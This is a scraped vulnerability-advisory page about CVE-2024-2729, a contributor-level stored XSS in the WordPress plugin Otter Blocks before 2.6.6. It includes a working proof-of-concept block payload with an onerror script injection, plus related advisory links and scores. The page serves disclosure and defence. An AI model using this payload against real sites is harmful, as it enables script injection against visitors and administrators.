Lucene search
Dmitrii IgnatyevWPEX-ID:5014F886-020E-49D1-96A5-2159EED8BA14HistoryMar 28, 2024 - 12:00 a.m.
Otter Blocks < 2.6.6 - Contributor+ Stored XSS
2024-03-2800:00:00
Dmitrii Ignatyev
27
otter blocks
contributor
stored xss
payload
code editor mode
themeisle blocks
review
exploit
Description The plugin does not properly escape its mainHeadings blocks’ attribute before appending it to the final rendered block, allowing contributors to conduct Stored XSS attacks.
As a contributor, put the following payload in a post while in Code Editor mode
<!-- wp:themeisle-blocks/review {"id":"wp-block-themeisle-blocks-review-b973b49a","title":"123","mainHeading":"img src=x onerror=alert(1) style=width:150px;","className":""} /-->
The XSS will be triggered when viewing/prevewing the postReferences
Related
cve
cve
CVE-2024-2729
2024-04-18 05:15:48
wpvulndb
wpvulndb
Otter Blocks < 2.6.6 - Contributor+ Stored XSS
2024-03-28 00:00:00
nvd
nvd
CVE-2024-2729
2024-04-18 05:15:48
cvelist
cvelist
CVE-2024-2729 Otter Blocks < 2.6.6 - Contributor+ Stored XSS
2024-04-18 05:00:02
wordfence
wordfence
9.1 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.2%
Related for WPEX-ID:5014F886-020E-49D1-96A5-2159EED8BA14